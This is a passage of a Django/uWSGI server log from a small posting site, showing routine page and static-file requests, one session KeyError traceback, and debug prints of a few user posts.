bytes} [Thu Jan 14 12:13:26 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2526] 180.160.48.43 () {38 vars in 720 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2527] 180.160.48.43 () {38 vars in 745 bytes} [Thu Jan 14 12:13:27 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2528] 180.160.48.43 () {38 vars in 731 bytes} [Thu Jan 14 12:13:27 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1999/2529] 219.228.146.135 () {42 vars in 975 bytes} [Thu Jan 14 12:13:27 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2000/2530] 180.160.48.43 () {48 vars in 1008 bytes} [Thu Jan 14 12:13:27 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2001/2531] 180.160.48.43 () {40 vars in 910 bytes} [Thu Jan 14 12:13:27 2021] GET /home/ => generated 10104 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2532] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 12:13:27 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2002/2533] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 12:13:31 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 43 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2534] 180.160.48.43 () {38 vars in 752 bytes} [Thu Jan 14 12:13:38 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2535] 180.160.48.43 () {34 vars in 546 bytes} [Thu Jan 14 12:13:38 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2536] 180.160.48.43 () {38 vars in 758 bytes} [Thu Jan 14 12:13:38 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2003/2537] 180.160.48.43 () {40 vars in 769 bytes} [Thu Jan 14 12:13:43 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2004/2538] 180.160.48.43 () {40 vars in 771 bytes} [Thu Jan 14 12:13:43 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2539] 180.160.48.43 () {38 vars in 719 bytes} [Thu Jan 14 12:13:43 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2005/2540] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 12:13:44 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2541] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 12:13:44 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2542] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 12:13:44 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2006/2543] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:13:51 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2007/2544] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 12:13:58 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2008/2545] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 12:13:59 2021] GET /home/ => generated 10081 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2546] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 12:13:59 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2009/2547] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:14:06 2021] GET /all-0-0-0 => generated 12433 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2548] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 12:14:06 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2549] 219.228.146.135 () {40 vars in 863 bytes} [Thu Jan 14 12:14:06 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2550] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 12:14:06 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2551] 219.228.146.135 () {38 vars in 846 bytes} [Thu Jan 14 12:14:06 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2010/2552] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 12:14:34 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2011/2553] 180.160.48.43 () {40 vars in 883 bytes} [Thu Jan 14 12:14:37 2021] GET /home/ => generated 10095 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2554] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 12:14:37 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2012/2555] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 12:14:39 2021] GET /all-0-0-0 => generated 12447 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2556] 180.160.48.43 () {40 vars in 859 bytes} [Thu Jan 14 12:14:39 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2557] 180.160.48.43 () {38 vars in 806 bytes} [Thu Jan 14 12:14:39 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +Internal Server Error: /publish/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 280, in publish + uid = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 661|app: 0|req: 2013/2558] 180.160.48.43 () {46 vars in 909 bytes} [Thu Jan 14 12:14:43 2021] POST /publish/ => generated 58870 bytes in 53 msecs (HTTP/1.1 500) 6 headers in 186 bytes (2 switches on core 1) +Not Found: /favicon.ico +[pid: 661|app: 0|req: 2014/2559] 180.160.48.43 () {34 vars in 524 bytes} [Thu Jan 14 12:14:43 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +123 123 +[pid: 661|app: 0|req: 2015/2560] 219.228.146.135 () {48 vars in 1100 bytes} [Thu Jan 14 12:14:44 2021] POST /publish/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2016/2561] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 12:14:44 2021] GET /single/11 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2017/2562] 219.228.146.135 () {42 vars in 956 bytes} [Thu Jan 14 12:14:44 2021] GET /single/11/ => generated 9064 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2018/2563] 180.160.48.43 () {40 vars in 771 bytes} [Thu Jan 14 12:14:48 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2019/2564] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 12:14:48 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 661|app: 0|req: 2020/2565] 180.160.48.43 () {38 vars in 720 bytes} [Thu Jan 14 12:14:51 2021] GET /all-3-0-0 => generated 10285 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2021/2566] 180.160.48.43 () {40 vars in 765 bytes} [Thu Jan 14 12:14:53 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2022/2567] 180.160.48.43 () {40 vars in 767 bytes} [Thu Jan 14 12:14:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2568] 180.160.48.43 () {38 vars in 722 bytes} [Thu Jan 14 12:14:53 2021] GET /static/css/flexslider.css => generated 3552 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2023/2569] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 12:14:57 2021] GET /ownpublish-0-0-0 => generated 9958 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[] +[pid: 661|app: 0|req: 2024/2570] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:14:57 2021] GET /all-7-0-0 => generated 9613 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2025/2571] 219.228.146.135 () {48 vars in 1039 bytes} [Thu Jan 14 12:14:58 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2026/2572] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 12:14:58 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2027/2573] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:15:00 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2028/2574] 180.160.48.43 () {50 vars in 949 bytes} [Thu Jan 14 12:15:07 2021] POST /login/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1) +[pid: 661|app: 0|req: 2029/2575] 180.160.48.43 () {40 vars in 804 bytes} [Thu Jan 14 12:15:07 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2030/2576] 180.160.48.43 () {40 vars in 806 bytes} [Thu Jan 14 12:15:07 2021] GET /home/ => generated 10080 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2577] 180.160.48.43 () {38 vars in 808 bytes} [Thu Jan 14 12:15:07 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2031/2578] 180.160.48.43 () {40 vars in 809 bytes} [Thu Jan 14 12:15:09 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2032/2579] 180.160.48.43 () {40 vars in 811 bytes} [Thu Jan 14 12:15:09 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +表白何佳喧女士 表白(≧﹏ ≦) +[pid: 661|app: 0|req: 2033/2580] 180.160.48.43 () {46 vars in 953 bytes} [Thu Jan 14 12:15:48 2021] POST /publish/ => generated 0 bytes in 26 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2034/2581] 180.160.48.43 () {42 vars in 847 bytes} [Thu Jan 14 12:15:49 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2035/2582] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:15:49 2021] GET /single/12/ => generated 9119 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2583] 180.160.48.43 () {38 vars in 793 bytes} [Thu Jan 14 12:15:49 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2036/2584] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:15:59 2021] GET /all-0-0-0 => generated 12818 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2585] 180.160.48.43 () {38 vars in 806 bytes} [Thu Jan 14 12:15:59 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2586] 180.160.48.43 () {38 vars in 808 bytes} [Thu Jan 14 12:15:59 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +算法作业最后一题有人会吗 tutorial 88 的第 88 题 +[pid: 661|app: 0|req: 2037/2587] 180.160.48.43 () {48 vars in 1101 bytes} [Thu Jan 14 12:16:12 2021] POST /publish/ => generated 0 bytes in 131 msecs (HTTP/1.1 302) 7 headers in 203 bytes (24 switches on core 1) +[pid: 661|app: 0|req: 2038/2588] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 12:16:12 2021] GET /single/13 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2039/2589] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 12:16:12 2021] GET /single/13/ => generated 9199 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2590] 180.160.48.43 () {38 vars in 873 bytes} [Thu Jan 14 12:16:12 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2040/2591] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:16:13 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2041/2592] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:16:14 2021] GET /single/12/ => generated 9119 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2042/2593] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:16:18 2021] GET /all-0-0-0 => generated 13257 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2594] 180.160.48.43 () {40 vars in 903 bytes} [Thu Jan 14 12:16:18 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2595] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:16:18 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2596] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:16:18 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2043/2597] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:16:20 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2044/2598] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:16:20 2021] GET /single/12/ => generated 9143 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2045/2599] 180.160.48.43 () {40 vars in 832 bytes} [Thu Jan 14 12:16:26 2021] GET /ownpublish-0-0-0 => generated 9990 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2046/2600] 180.160.48.43 () {40 vars in 916 bytes} [Thu Jan 14 12:16:31 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 2047/2601] 180.160.48.43 () {40 vars in 824 bytes} [Thu Jan 14 12:16:31 2021] GET /all-3-0-0 => generated 9985 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2048/2602] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:16:45 2021] GET /all-0-0-0 => generated 13233 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2603] 180.160.48.43 () {40 vars in 863 bytes} [Thu Jan 14 12:16:45 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2604] 180.160.48.43 () {38 vars in 836 bytes} [Thu Jan 14 12:16:45 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2049/2605] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:16:52 2021] GET /single/13 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2050/2606] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:16:52 2021] GET /single/13/ => generated 9175 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2607] 180.160.48.43 () {40 vars in 892 bytes} [Thu Jan 14 12:16:52 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2051/2608] 180.160.48.43 () {48 vars in 1007 bytes} [Thu Jan 14 12:16:54 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2052/2609] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 12:16:55 2021] GET /home/ => generated 10101 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2053/2610] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:17:01 2021] GET /all-0-0-0 => generated 13254 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2611] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:17:02 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2612] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:17:02 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2613] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:17:02 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2054/2614] 219.228.146.135 () {42 vars in 976 bytes} [Thu Jan 14 12:17:02 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2615] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 12:17:02 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2055/2616] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:17:06 2021] GET /single/13/ => generated 9196 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2056/2617] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 12:17:08 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2057/2618] 219.228.146.135 () {40 vars in 929 bytes} [Thu Jan 14 12:17:13 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2058/2619] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:17:14 2021] GET /all-0-0-0 => generated 13233 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2059/2620] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:17:16 2021] GET /single/10 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2060/2621] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:17:16 2021] GET /single/10/ => generated 9206 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2622] 180.160.48.43 () {40 vars in 864 bytes} [Thu Jan 14 12:17:16 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +123 123 +[pid: 661|app: 0|req: 2061/2623] 219.228.146.135 () {48 vars in 1100 bytes} [Thu Jan 14 12:17:22 2021] POST /publish/ => generated 0 bytes in 30 msecs (HTTP/1.1 302) 7 headers in 203 bytes (2 switches on core 1) +[pid: 661|app: 0|req: 2062/2624] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 12:17:22 2021] GET /single/14 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2063/2625] 219.228.146.135 () {42 vars in 956 bytes} [Thu Jan 14 12:17:22 2021] GET /single/14/ => generated 9064 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2064/2626] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:17:25 2021] GET /all-0-0-0 => generated 13586 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2065/2627] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:17:25 2021] GET /single/10/ => generated 9227 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2066/2628] 219.228.146.135 () {40 vars in 939 bytes} [Thu Jan 14 12:17:27 2021] GET /ownpublish-0-0-0 => generated 9958 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2067/2629] 180.160.48.43 () {40 vars in 815 bytes} [Thu Jan 14 12:17:28 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2068/2630] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:17:28 2021] GET /single/2/ => generated 9285 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2069/2631] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:17:28 2021] GET /single/2/ => generated 9306 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2070/2632] 219.228.146.135 () {48 vars in 1039 bytes} [Thu Jan 14 12:17:30 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2071/2633] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 12:17:30 2021] GET /ownpublish-0-0-0 => generated 9489 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2072/2634] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:17:32 2021] GET /all-0-0-0 => generated 13233 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2073/2635] 180.160.48.43 () {40 vars in 813 bytes} [Thu Jan 14 12:17:34 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2074/2636] 180.160.48.43 () {40 vars in 815 bytes} [Thu Jan 14 12:17:34 2021] GET /single/4/ => generated 9163 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2075/2637] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:17:44 2021] GET /all-0-0-0 => generated 13233 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2076/2638] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:17:45 2021] GET /single/4/ => generated 9184 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2077/2639] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:17:47 2021] GET /single/12 => generated 